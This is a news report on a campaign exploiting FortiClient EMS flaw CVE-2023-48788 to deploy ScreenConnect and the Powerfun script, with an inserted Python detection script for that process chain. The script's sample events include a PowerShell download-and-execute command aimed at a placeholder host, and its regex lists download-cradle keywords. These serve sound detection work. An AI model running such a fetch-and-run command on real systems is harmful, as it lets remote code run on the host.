Attacks exploiting a critical SQL injection vulnerability impacting Fortinet FortiClient EMS devices, tracked as CVE-2023-48788, have been launched to facilitate the deployment of the ScreenConnect software and Metasploit Powerfun script as part of a new campaign, The Hacker News reports.
After initial attempts to install ScreenConnect by exploiting the flaw in an internet-exposed FortiClient EMS instance belonging to an unnamed media company failed, the threat actors used the msiexec utility to launch the software and then executed PowerShell code that downloaded the Powerfun script, according to a report from Forescout.
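The sequence Forescout describes, msiexec launched from the EMS process tree followed by PowerShell fetching a script, is the kind of thing endpoint process-creation telemetry can flag. The following is an added detection example, not code from the article or from Forescout: it assumes FortiClient EMS binaries live under a `Fortinet\FortiClientEMS` directory (an assumption about the install layout), uses a hypothetical parent process name and constructed events rather than real telemetry, and generalizes beyond the single incident to any host where both steps land within a short window.

```python
"""
Added example (not from the article or the Forescout report): flag the two
process-level steps described above over constructed process-creation events
and raise a combined finding when they occur on one host in sequence.
"""
import re
from datetime import datetime, timedelta

# Assumption: FortiClient EMS binaries are installed under this directory.
# Matched case-insensitively against the lowercased parent image path.
EMS_DIR_MARKER = "\\fortinet\\forticlientems\\"

# Command-line fragments typical of PowerShell download-and-execute one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|\biex\b|invoke-expression",
    re.IGNORECASE,
)

# How long after the msiexec launch a PowerShell download still counts as the
# same chain.
CHAIN_WINDOW = timedelta(minutes=30)

# Constructed sample events (not real telemetry). The EMS parent process name
# is a placeholder, and the URL is a reserved .invalid domain.
SAMPLE_EVENTS = [
    {"host": "ems01", "ts": datetime(2024, 3, 20, 10, 0, 0),
     "parent": "C:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\placeholder_ems_service.exe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Windows\\Temp\\setup.msi /quiet"},
    {"host": "ems01", "ts": datetime(2024, 3, 20, 10, 2, 0),
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -nop -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/p.ps1')"},
    {"host": "ws07", "ts": datetime(2024, 3, 20, 11, 0, 0),
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Users\\jdoe\\Downloads\\7zip.msi"},
    {"host": "ws07", "ts": datetime(2024, 3, 20, 11, 5, 0),
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c Get-Service"},
]


def _basename(path: str) -> str:
    """Lowercased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list[str]:
    """Return the names of the per-event rules a process-creation event matches."""
    hits = []
    parent = ev["parent"].lower()
    image = _basename(ev["image"])
    if image == "msiexec.exe" and EMS_DIR_MARKER in parent:
        hits.append("msiexec_from_ems")
    if image in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE.search(ev["cmdline"]):
        hits.append("powershell_download_cradle")
    return hits


def detect(events: list[dict]) -> list[dict]:
    """Per-event findings, plus one chain finding per host where a PowerShell
    download cradle follows an EMS-spawned msiexec within CHAIN_WINDOW."""
    findings = []
    per_host: dict[str, list[tuple[datetime, str]]] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule in classify(ev):
            findings.append({"host": ev["host"], "ts": ev["ts"], "rule": rule,
                             "cmdline": ev["cmdline"]})
            per_host.setdefault(ev["host"], []).append((ev["ts"], rule))
    for host, seq in per_host.items():
        msi_times = [t for t, r in seq if r == "msiexec_from_ems"]
        for t, r in seq:
            if r == "powershell_download_cradle" and any(
                timedelta(0) <= t - m <= CHAIN_WINDOW for m in msi_times
            ):
                findings.append({"host": host, "ts": t,
                                 "rule": "ems_msiexec_then_powershell_chain",
                                 "cmdline": ""})
                break
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']} {f['ts']:%H:%M:%S} {f['rule']} {f['cmdline']}")
```

The per-event rules are noisy on their own (administrators run msiexec and PowerShell legitimately, as the `ws07` events show), so the chain finding is the one worth paging on; the parent-path check is what ties the msiexec launch back to the EMS service rather than to an interactive user.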
The researchers said the failed ScreenConnect installation attempts point to a manual component in the campaign, which resembles previously reported exploitation of the flaw to deliver ScreenConnect and Atera.
"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances," the researchers added.